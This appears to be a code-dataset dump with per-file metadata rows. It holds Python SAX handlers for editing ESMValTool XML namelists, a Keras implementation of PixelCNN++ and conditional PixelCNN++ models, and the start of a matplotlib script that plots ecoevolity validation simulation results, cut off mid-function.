self.namelist_sections["header"] = self.str
self.str = ""
self.current_location = "MODELS"
else:
self.str = self.str + '<' + name
if attr:
for key in attr.keys():
self.str = self.str + " " + key + '="' + attr[key] + '"'
self.str = self.str + '>'
def characters(self, data):
self.str = self.str + data
def endElement(self, name):
""" @brief default SAX endElement event handler
@param name default SAX endElement argument
"""
if name == "MODELS":
self.namelist_sections["MODELS"] = self.str
self.str = ""
elif name == "namelist":
self.current_location = "footer"
self.namelist_sections["footer"] = self.str + '</namelist>'
self.str = ""
else:
self.str = self.str + '</' + name + '>'
class setGlobal(xml.sax.handler.ContentHandler):
""" @brief SAX handler class for parsing ESMValTool namelists
SAX handler class for setting global settings the ESMValTool
XML-file and adding models to the <MODELS>-tag
"""
def __init__(self, dict_repl):
""" @brief Initialize SAX namelist handler variables
"""
## A dictionary holding the data read from the XML-file
self.dict_repl = dict_repl
self.str = ""
self.attributes = None
self.current_tag = None
def startElement(self, name, attr):
""" @brief default SAX startElement event handler
@param name default SAX startElement argument
@param attr default SAX startElement attribute
"""
self.str = self.str + '<' + name
if attr:
for key in attr.keys():
self.str = self.str + " " + key + '="' + attr[key] + '"'
self.str = self.str + '>'
self.current_tag = name
def characters(self, data):
self.str = self.str + data
def endElement(self, name):
""" @brief default SAX endElement event handler
@param name default SAX endElement argument
"""
if name in self.dict_repl.keys():
self.str = re.sub('(.*>).*$', r'\1' + self.dict_repl[name], self.str)
self.str = self.str + '</' + name + '>'
class addModel(xml.sax.handler.ContentHandler):
""" @brief SAX handler class for parsing ESMValTool namelists
SAX handler class for reading the ESMValTool XML-file and
adding model to the <diag>-tag
"""
def __init__(self, variable):
""" @brief Initialize SAX namelist handler variables
"""
## A dictionary holding the data read from the XML-file
self.variable = variable
self.namelist_sections = {}
self.namelist_sections["header"] = ""
self.namelist_sections["footer"] = ""
self.str = ""
self.attributes = None
def startElement(self, name, attr):
""" @brief default SAX startElement event handler
@param name default SAX startElement argument
@param attr default SAX startElement attribute
"""
if name == "namelist":
self.current_location = "header"
self.str = self.str + '<namelist>'
else:
self.str = self.str + '<' + name
if attr:
for key in attr.keys():
self.str = self.str + " " + key + '="' + attr[key] + '"'
self.str = self.str + '>'
def characters(self, data):
self.str = self.str + data
def endElement(self, name):
""" @brief default SAX endElement event handler
@param name default SAX endElement argument
"""
if name == "variable":
self.str = self.str + '</' + name + '>'
element_value = re.search('.*>\s+(.*)</variable>', self.str, re.DOTALL).group(1).strip()
if self.variable == element_value:
if len(self.namelist_sections["header"]) < 1:
self.namelist_sections["header"] = self.str
self.str = ""
elif name == "namelist":
self.current_location = "footer"
self.namelist_sections["footer"] = self.str + '</namelist>'
self.str = ""
else:
self.str = self.str + '</' + name + '>'
class setGlobal(xml.sax.handler.ContentHandler):
""" @brief SAX handler class for parsing ESMValTool namelists
SAX handler class for setting global settings the ESMValTool
XML-file and adding models
"""
def __init__(self, dict_repl):
""" @brief Initialize SAX namelist handler variables
"""
## A dictionary holding the data read from the XML-file
self.dict_repl = dict_repl
self.str = ""
self.attributes = None
self.current_tag = None
def startElement(self, name, attr):
""" @brief default SAX startElement event handler
@param name default SAX startElement argument
@param attr default SAX startElement attribute
"""
self.str = self.str + '<' + name
if attr:
for key in attr.keys():
self.str = self.str + " " + key + '="' + attr[key] + '"'
self.str = self.str + '>'
self.current_tag = name
def characters(self, data):
self.str = self.str + data
def endElement(self, name):
""" @brief default SAX endElement event handler
@param name default SAX endElement argument
"""
if name in self.dict_repl.keys():
self.str = re.sub('(.*>).*$', r'\1' + self.dict_repl[name], self.str)
self.str = self.str + '</' + name + '>'
| 35.015444
| 100
| 0.55607
| 985
| 9,069
| 5.04467
| 0.093401
| 0.121151
| 0.099618
| 0.104246
| 0.905615
| 0.891125
| 0.887905
| 0.887905
| 0.882673
| 0.882673
| 0
| 0.000654
| 0.325394
| 9,069
| 258
| 101
| 35.151163
| 0.81154
| 0.270041
| 0
| 0.807947
| 0
| 0
| 0.065576
| 0.003434
| 0
| 0
| 0
| 0
| 0
| 1
| 0.145695
| false
| 0
| 0.019868
| 0.006623
| 0.211921
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f1372a617355936ee73bad7f07c59d3284f903f0
| 13,974
|
py
|
Python
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 2
|
2020-05-18T18:04:22.000Z
|
2020-05-18T19:00:11.000Z
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 3
|
2020-01-27T02:47:02.000Z
|
2022-02-09T23:38:40.000Z
|
pixelcnn/pixelcnn_plus_plus.py
|
jrmylee/pixelcnn
|
77bf8eb43547bc8ff1e254d961d81141900c0a58
|
[
"MIT"
] | 2
|
2020-05-18T19:02:54.000Z
|
2021-12-02T07:07:03.000Z
|
"""Author: Brandon Trabucco, Copyright 2020, MIT License"""
from pixelcnn.gated_resnet import gated_resnet
from pixelcnn.ops import down_shifted_conv2d
from pixelcnn.ops import down_right_shifted_conv2d
from pixelcnn.ops import down_shifted_conv2d_transpose
from pixelcnn.ops import down_right_shifted_conv2d_transpose
from pixelcnn.ops import down_shift
from pixelcnn.ops import right_shift
from pixelcnn.ops import concat_elu
from tensorflow.keras import layers
from tensorflow.keras import models
import tensorflow as tf
def PixelCNNPlusPlus(
output_size,
image_height=32,
image_width=32,
image_is_discrete=True,
num_modules=3,
num_layers_per_module=6,
filters=256,
dropout_rate=0.1,
**kwargs
):
"""Build a Pixel CNN ++ model in Keras.
Args:
- output_size: the cardinality of the output vector space.
- image_height: the height of the images to generate.
- image_width: the width of the images to generate.
- image_is_discrete: a boolean that indicates whether
the image is discrete or continuous features.
- num_modules: the number of Residual Modules.
- num_layers: the number of Gated Masked Conv2D layers
per module.
- filters: the number of filters iun each Conv2D layer.
- dropout_rate: the fraction of units to drop.
Returns:
- model: a Keras model that accepts one tf.int32 tensor
with shape [batch_dim, image_height, image_width]
"""
if image_is_discrete:
images = layers.Input(shape=[image_height, image_width])
else:
images = layers.Input(shape=[image_height, image_width, filters])
#####################################################
# Embed the discrete image pixels in a vector space #
#####################################################
def padding_backend(z):
return tf.pad(
z,
[[0, 0], [0, 0], [0, 0], [0, 1]],
constant_values=1)
if image_is_discrete:
images_embedding = layers.TimeDistributed(
layers.Embedding(output_size, filters))(images)
else:
images_embedding = images
images_embedding = layers.Lambda(padding_backend)(images_embedding)
##############################################
# Prepare the image for shifted convolutions #
##############################################
top_streams = [down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 3)))]
initial_top_left_stream_a = down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(1, 3)))
initial_top_left_stream_b = right_shift(
down_right_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 1)))
top_left_streams = [
layers.add([initial_top_left_stream_a, initial_top_left_stream_b])]
######################################################
# Downsample with Residual Gated Masked Convolutions #
######################################################
for block in range(num_modules):
for layer in range(num_layers_per_module):
top_streams.append(gated_resnet(
top_streams[-1],
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs))
top_left_streams.append(gated_resnet(
top_left_streams[-1],
a=top_streams[-1],
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs))
if block < num_modules - 1:
top_streams[-1] = down_shifted_conv2d(
top_streams[-1],
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left_streams[-1] = down_right_shifted_conv2d(
top_left_streams[-1],
filters,
(2, 2),
strides=(2, 2),
**kwargs)
####################################################
# Upsample with Residual Gated Masked Convolutions #
####################################################
top = top_streams.pop()
top_left = top_left_streams.pop()
for block in reversed(range(num_modules)):
if block < num_modules - 1:
top = down_shifted_conv2d_transpose(
top,
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left = down_right_shifted_conv2d_transpose(
top_left,
filters,
(2, 2),
strides=(2, 2),
**kwargs)
for layer in range(num_layers_per_module):
top = gated_resnet(
top,
a=top_streams.pop(),
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs)
top_left = gated_resnet(
top_left,
a=layers.concatenate([top, top_left_streams.pop()]),
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs)
#################################################
# Compute logits for every image pixel location #
#################################################
top_left = concat_elu(top_left)
logits = layers.Conv2D(
output_size,
(1, 1),
strides=(1, 1),
padding='valid',
data_format='channels_last',
**kwargs)(top_left)
return models.Model(inputs=[images], outputs=logits)
def ConditionalPixelCNNPlusPlus(
output_size,
conditional_vector_size,
image_height=32,
image_width=32,
image_is_discrete=True,
conditional_height=1,
conditional_width=1,
class_conditional=True,
num_classes=None,
num_preprocess_layers=5,
num_modules=3,
num_layers_per_module=6,
filters=256,
dropout_rate=0.1,
**kwargs
):
"""Build a Conditional Pixel CNN ++ model in Keras.
Args:
- output_size: the cardinality of the output vector space.
- conditional_vector_size: the cardinality of the vector space
for conditioning image generation.
- image_height: the height of the images to generate.
- image_width: the width of the images to generate.
- image_is_discrete: a boolean that indicates whether
the image is discrete or continuous features.
- conditional_height: the height of the conditional input.
- conditional_width: the width of the conditional input.
- class_conditional: a boolean that indicates that
the conditional inputs are class labels.
- num_classes: an integer that determines the number
of unique classes to condition on.
- num_preprocess_layers: the number of Conv2DTranspose layers
for upsampling the conditional input.
- num_modules: the number of Residual Modules.
- num_layers: the number of Gated Masked Conv2D layers
per module.
- filters: the number of filters iun each Conv2D layer.
- dropout_rate: the fraction of units to drop.
Returns:
- model: a Keras model that accepts one tf.int32 tensor
with shape [batch_dim, image_height, image_width] and
with shape [batch_dim, conditional_height,
conditional_width, conditional_vector_size]
"""
if image_is_discrete:
images = layers.Input(shape=[image_height, image_width])
else:
images = layers.Input(shape=[image_height, image_width, filters])
if class_conditional:
inputs = layers.Input(shape=[conditional_height, conditional_width])
else:
inputs = layers.Input(shape=[
conditional_height, conditional_width, conditional_vector_size])
#####################################################
# Upsample the conditional inputs to the image size #
#####################################################
conditional_embedding = [inputs]
if class_conditional:
conditional_embedding[-1] = layers.TimeDistributed(
layers.Embedding(
num_classes, conditional_vector_size))(conditional_embedding[-1])
for i in range(num_preprocess_layers):
x = conditional_embedding[-1]
if i > 0:
x = concat_elu(x)
conditional_embedding.append(layers.Conv2DTranspose(
filters,
(5, 5),
strides=(2, 2),
padding='same',
data_format='channels_last',
**kwargs)(x))
#####################################################
# Embed the discrete image pixels in a vector space #
#####################################################
def padding_backend(z):
return tf.pad(
z,
[[0, 0], [0, 0], [0, 0], [0, 1]],
constant_values=1)
if image_is_discrete:
images_embedding = layers.TimeDistributed(
layers.Embedding(output_size, filters))(images)
else:
images_embedding = images
images_embedding = layers.Lambda(padding_backend)(images_embedding)
##############################################
# Prepare the image for shifted convolutions #
##############################################
top_streams = [down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 3)))]
initial_top_left_stream_a = down_shift(
down_shifted_conv2d(
images_embedding, filters, kernel_size=(1, 3)))
initial_top_left_stream_b = right_shift(
down_right_shifted_conv2d(
images_embedding, filters, kernel_size=(2, 1)))
top_left_streams = [
layers.add([
initial_top_left_stream_a, initial_top_left_stream_b])]
######################################################
# Downsample with Residual Gated Masked Convolutions #
######################################################
for block in range(num_modules):
for layer in range(num_layers_per_module):
top_streams.append(gated_resnet(
top_streams[-1],
h=conditional_embedding[-(block + 1)],
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs))
top_left_streams.append(gated_resnet(
top_left_streams[-1],
a=top_streams[-1],
h=conditional_embedding[-(block + 1)],
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs))
if block < num_modules - 1:
top_streams[-1] = down_shifted_conv2d(
top_streams[-1],
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left_streams[-1] = down_right_shifted_conv2d(
top_left_streams[-1],
filters,
(2, 2),
strides=(2, 2),
**kwargs)
####################################################
# Upsample with Residual Gated Masked Convolutions #
####################################################
top = top_streams.pop()
top_left = top_left_streams.pop()
for block in reversed(range(num_modules)):
if block < num_modules - 1:
top = down_shifted_conv2d_transpose(
top,
filters,
(2, 3),
strides=(2, 2),
**kwargs)
top_left = down_right_shifted_conv2d_transpose(
top_left,
filters,
(2, 2),
strides=(2, 2),
**kwargs)
for layer in range(num_layers_per_module):
top = gated_resnet(
top,
a=top_streams.pop(),
h=conditional_embedding[-(block + 1)],
conv2d=down_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 3),
dropout_rate=dropout_rate,
**kwargs)
top_left = gated_resnet(
top_left,
a=layers.concatenate([top, top_left_streams.pop()]),
h=conditional_embedding[-(block + 1)],
conv2d=down_right_shifted_conv2d,
nonlinearity=concat_elu,
kernel_size=(2, 2),
dropout_rate=dropout_rate,
**kwargs)
#################################################
# Compute logits for every image pixel location #
#################################################
top_left = concat_elu(top_left)
logits = layers.Conv2D(
output_size,
(1, 1),
strides=(1, 1),
padding='valid',
data_format='channels_last',
**kwargs)(top_left)
return models.Model(inputs=[images, inputs], outputs=logits)
| 33.917476
| 82
| 0.521898
| 1,395
| 13,974
| 4.960573
| 0.116846
| 0.038439
| 0.034393
| 0.03815
| 0.838873
| 0.818497
| 0.818497
| 0.798555
| 0.762139
| 0.762139
| 0
| 0.020267
| 0.325605
| 13,974
| 411
| 83
| 34
| 0.714028
| 0.181194
| 0
| 0.850575
| 0
| 0
| 0.005463
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015326
| false
| 0
| 0.042146
| 0.007663
| 0.072797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f137b80e405c15ba58855ca3ca394df1d3231139
| 150,492
|
py
|
Python
|
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
bin/plot_validation_sim_results.py
|
phyletica/ecoevolity-experiments
|
bb16e34c4c7495feaa68653df98d5fbead93cf44
|
[
"CC-BY-4.0"
] | null | null | null |
#! /usr/bin/env python
import sys
import os
import re
import math
import glob
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.DEBUG)
_LOG = logging.getLogger(os.path.basename(__file__))
import pycoevolity
import project_util
import matplotlib as mpl
# Use TrueType (42) fonts rather than Type 3 fonts
mpl.rcParams["pdf.fonttype"] = 42
mpl.rcParams["ps.fonttype"] = 42
tex_font_settings = {
"text.usetex": True,
"font.family": "sans-serif",
# "font.serif": [
# "Computer Modern Roman",
# "Times",
# ],
# "font.sans-serif": [
# "Computer Modern Sans serif",
# "Helvetica",
# ],
# "font.cursive": [
# "Zapf Chancery",
# ],
# "font.monospace": [
# "Computer Modern Typewriter",
# "Courier",
# ],
"text.latex.preamble" : [
"\\usepackage[T1]{fontenc}",
"\\usepackage[cm]{sfmath}",
]
}
mpl.rcParams.update(tex_font_settings)
import matplotlib.pyplot as plt
from matplotlib import gridspec
def get_standardized_partiton(element_vector):
el_map = {}
next_idx = 0
partition = []
values = {}
for i, el in enumerate(element_vector):
if not el_map.has_key(el):
el_map[el] = next_idx
values[next_idx] = [el]
next_idx += 1
partition.append(el_map[el])
return partition
def get_standardized_partiton_str(element_vector):
p = get_standardized_partiton(element_vector)
return "".join(str(e) for e in p)
def get_nevents_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k",
variable_only = False):
results_file_name = "results.csv.gz"
if variable_only:
results_file_name = "var-only-results.csv.gz"
results_paths = sorted(glob.glob(
os.path.join(project_util.VAL_DIR,
sim_dir,
"batch*",
results_file_name)))
probs = []
prob_key = "num_events_{0}_p".format(nevents)
for d in pycoevolity.parsing.spreadsheet_iter(results_paths):
probs.append((
float(d[prob_key]),
int(int(d["true_num_events"]) == nevents)
))
return probs
def bin_prob_correct_tuples(probability_correct_tuples, nbins = 20):
bin_upper_limits = list(get_sequence_iter(0.0, 1.0, nbins+1))[1:]
bin_width = (bin_upper_limits[1] - bin_upper_limits[0]) / 2.0
bins = [[] for i in range(nbins)]
n = 0
for (p, t) in probability_correct_tuples:
n += 1
binned = False
for i, l in enumerate(bin_upper_limits):
if p < l:
bins[i].append((p, t))
binned = True
break
if not binned:
bins[i].append((p, t))
total = 0
for b in bins:
total += len(b)
assert total == n
assert len(bins) == nbins
est_true_tups = []
for i, b in enumerate(bins):
#######################################
# est = bin_upper_limits[i] - bin_width
ests = [p for (p, t) in b]
est = sum(ests) / float(len(ests))
#######################################
correct = [t for (p, t) in b]
true = sum(correct) / float(len(correct))
est_true_tups.append((est, true))
return bins, est_true_tups
def get_nevents_estimated_true_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k",
variable_only = False,
nbins = 20):
if variable_only:
_LOG.info("Parsing num_events results for {0} (variable only)".format(sim_dir))
else:
_LOG.info("Parsing num_events results for {0} (all sites)".format(sim_dir))
nevent_probs = get_nevents_probs(
nevents = nevents,
sim_dir = sim_dir,
variable_only = variable_only)
_LOG.info("\tparsed results for {0} simulations".format(len(nevent_probs)))
bins, tups = bin_prob_correct_tuples(nevent_probs, nbins = nbins)
_LOG.info("\tbin sample sizes: {0}".format(
", ".join(str(len(b)) for b in bins)
))
return bins, tups
def plot_nevents_estimated_vs_true_probs(
nevents = 1,
sim_dir = "03pairs-dpp-root-0100-100k",
nbins = 20,
plot_file_prefix = "",
include_unlinked_only = False):
bins, est_true_probs = get_nevents_estimated_true_probs(
nevents = nevents,
sim_dir = sim_dir,
variable_only = False,
nbins = nbins)
vo_bins, vo_est_true_probs = get_nevents_estimated_true_probs(
nevents = nevents,
sim_dir = sim_dir,
variable_only = True,
nbins = nbins)
if include_unlinked_only:
uo_bins, uo_est_true_probs = get_nevents_estimated_true_probs(
nevents = nevents,
sim_dir = sim_dir.replace("0l", "0ul"),
variable_only = False,
nbins = nbins)
plt.close('all')
if include_unlinked_only:
fig = plt.figure(figsize = (7.5, 2.5))
ncols = 3
else:
fig = plt.figure(figsize = (5.2, 2.5))
ncols = 2
nrows = 1
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
ax = plt.subplot(gs[0, 0])
x = [e for (e, t) in est_true_probs]
y = [t for (e, t) in est_true_probs]
sample_sizes = [len(b) for b in bins]
line, = ax.plot(x, y)
plt.setp(line,
marker = 'o',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 3.5,
linestyle = '',
zorder = 100,
rasterized = False)
ax.set_xlim(0.0, 1.0)
ax.set_ylim(0.0, 1.0)
for i, (label, lx, ly) in enumerate(zip(sample_sizes, x, y)):
if i == 0:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (1, 1),
textcoords = "offset points",
horizontalalignment = "left",
verticalalignment = "bottom")
elif i == len(x) - 1:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, -1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "top")
else:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, 1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "bottom")
title_text = ax.set_title("All sites")
ylabel_text = ax.set_ylabel("True probability", size = 14.0)
if include_unlinked_only:
ax.text(1.5, -0.14,
"Posterior probability of one divergence",
horizontalalignment = "center",
verticalalignment = "top",
size = 14.0)
else:
ax.text(1.0, -0.14,
"Posterior probability of one divergence",
horizontalalignment = "center",
verticalalignment = "top",
size = 14.0)
identity_line, = ax.plot(
[0.0, 1.0],
[0.0, 1.0])
plt.setp(identity_line,
color = '0.8',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
ax = plt.subplot(gs[0, 1])
x = [e for (e, t) in vo_est_true_probs]
y = [t for (e, t) in vo_est_true_probs]
sample_sizes = [len(b) for b in vo_bins]
line, = ax.plot(x, y)
plt.setp(line,
marker = 'o',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 3.5,
linestyle = '',
zorder = 100,
rasterized = False)
ax.set_xlim(0.0, 1.0)
ax.set_ylim(0.0, 1.0)
for i, (label, lx, ly) in enumerate(zip(sample_sizes, x, y)):
if i == 0:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (1, 1),
textcoords = "offset points",
horizontalalignment = "left",
verticalalignment = "bottom")
elif i == len(x) - 1:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, -1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "top")
else:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, 1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "bottom")
vo_title_text = ax.set_title("Variable only")
identity_line, = ax.plot(
[0.0, 1.0],
[0.0, 1.0])
plt.setp(identity_line,
color = '0.8',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
if include_unlinked_only:
ax = plt.subplot(gs[0, 2])
x = [e for (e, t) in uo_est_true_probs]
y = [t for (e, t) in uo_est_true_probs]
sample_sizes = [len(b) for b in uo_bins]
line, = ax.plot(x, y)
plt.setp(line,
marker = 'o',
markerfacecolor = 'none',
markeredgecolor = '0.35',
markeredgewidth = 0.7,
markersize = 3.5,
linestyle = '',
zorder = 100,
rasterized = False)
ax.set_xlim(0.0, 1.0)
ax.set_ylim(0.0, 1.0)
for i, (label, lx, ly) in enumerate(zip(sample_sizes, x, y)):
if i == 0:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (1, 1),
textcoords = "offset points",
horizontalalignment = "left",
verticalalignment = "bottom")
elif i == len(x) - 1:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, -1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "top")
else:
ax.annotate(
str(label),
xy = (lx, ly),
xytext = (-1, 1),
textcoords = "offset points",
horizontalalignment = "right",
verticalalignment = "bottom")
uo_title_text = ax.set_title("Unlinked only")
identity_line, = ax.plot(
[0.0, 1.0],
[0.0, 1.0])
plt.setp(identity_line,
color = '0.8',
linestyle = '-',
linewidth = 1.0,
marker = '',
zorder = 0)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
gs.update(left = 0.10, right = 0.995, bottom = 0.18, top = 0.91)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_file_name = "est-vs-true-prob-nevent-1.pdf"
if plot_file_prefix:
plot_file_name = plot_file_prefix + "-" + plot_file_name
plot_path = os.path.join(plot_dir,
plot_file_name)
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def get_sequence_iter(start = 0.0, stop = 1.0, n = 10):
assert(stop > start)
step = (stop - start) / float(n - 1)
return ((start + (i * step)) for i in range(n))
def truncate_color_map(cmap, min_val = 0.0, max_val = 10, n = 100):
new_cmap = mpl.colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(
n = cmap.name,
a = min_val,
b = max_val),
cmap(list(get_sequence_iter(min_val, max_val, n))))
return new_cmap
def get_root_gamma_parameters(root_alpha_string):
shape = float(root_alpha_string)
scale = 1.0 / shape
return shape, scale
def get_errors(values, lowers, uppers):
n = len(values)
assert(n == len(lowers))
assert(n == len(uppers))
return [[values[i] - lowers[i] for i in range(n)],
[uppers[i] - values[i] for i in range(n)]]
def get_results_paths(
validatition_sim_dir,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
include_variable_only = True):
dpp_500k_sim_dirs = []
dpp_500k_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-[0-9][0-9][0-9][0-9]-500k"))))
if include_root_size_fixed:
dpp_500k_sim_dirs.append(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-fixed-500k"))
if include_all_sizes_fixed:
dpp_500k_sim_dirs.append(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-fixed-all-500k"))
dpp_500k_results_paths = []
vo_dpp_500k_results_paths = []
for sim_dir in dpp_500k_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
vo_dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"var-only-results.csv.gz")))
)
)
dpp_100k_sim_dirs = []
dpp_100k_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-[0-9][0-9][0-9][0-9]-100k"))))
if include_root_size_fixed:
dpp_100k_sim_dirs.append(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-fixed-100k"))
if include_all_sizes_fixed:
dpp_100k_sim_dirs.append(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-fixed-all-100k"))
dpp_100k_results_paths = []
vo_dpp_100k_results_paths = []
for sim_dir in dpp_100k_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_100k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
vo_dpp_100k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"var-only-results.csv.gz")))
)
)
if not include_variable_only:
results_batches = {
"500k": dpp_500k_results_paths,
"100k": dpp_100k_results_paths,
}
row_keys = [
"500k",
"100k",
]
return row_keys, results_batches
results_batches = {
"500k": dpp_500k_results_paths,
"500k variable only": vo_dpp_500k_results_paths,
"100k": dpp_100k_results_paths,
"100k variable only": vo_dpp_100k_results_paths,
}
row_keys = [
"500k",
"500k variable only",
"100k",
"100k variable only",
]
return row_keys, results_batches
def get_root_1000_500k_results_paths(
validatition_sim_dir):
dpp_500k_sim_dirs = []
dpp_500k_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-1000-500k"))))
dpp_500k_results_paths = []
for sim_dir in dpp_500k_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_500k_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
results_batches = {
"500k": dpp_500k_results_paths,
}
row_keys = [
"500k",
]
return row_keys, results_batches
def get_linked_loci_results_paths(
validatition_sim_dir,
data_set_size = "100k",
include_variable_only = True,
include_unlinked_only = True):
dpp_sim_dirs = []
dpp_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-0100-{0}-*0l".format(data_set_size)))))
dpp_results_paths = []
vo_dpp_results_paths = []
for sim_dir in dpp_sim_dirs:
sim_name = os.path.basename(sim_dir)
dpp_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
vo_dpp_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"var-only-results.csv.gz")))
)
)
dpp_unlinked_sim_dirs = []
dpp_unlinked_sim_dirs.extend(sorted(glob.glob(os.path.join(
validatition_sim_dir,
"03pairs-dpp-root-0100-{0}-*0ul".format(data_set_size)))))
uo_dpp_results_paths = []
for sim_dir in dpp_unlinked_sim_dirs:
sim_name = os.path.basename(sim_dir)
uo_dpp_results_paths.append(
(sim_name, sorted(glob.glob(os.path.join(
sim_dir,
"batch00[12345]",
"results.csv.gz")))
)
)
s = data_set_size
results_batches = {
"{0}".format(s): dpp_results_paths,
}
row_keys = [
"{0}".format(s),
]
if include_variable_only:
results_batches["{0} variable only".format(s)] = vo_dpp_results_paths
row_keys.append("{0} variable only".format(s))
if include_unlinked_only:
results_batches["{0} unlinked only".format(s)] = uo_dpp_results_paths
row_keys.append("{0} unlinked only".format(s))
return row_keys, results_batches
def get_missing_data_results_paths(
validatition_sim_dir,
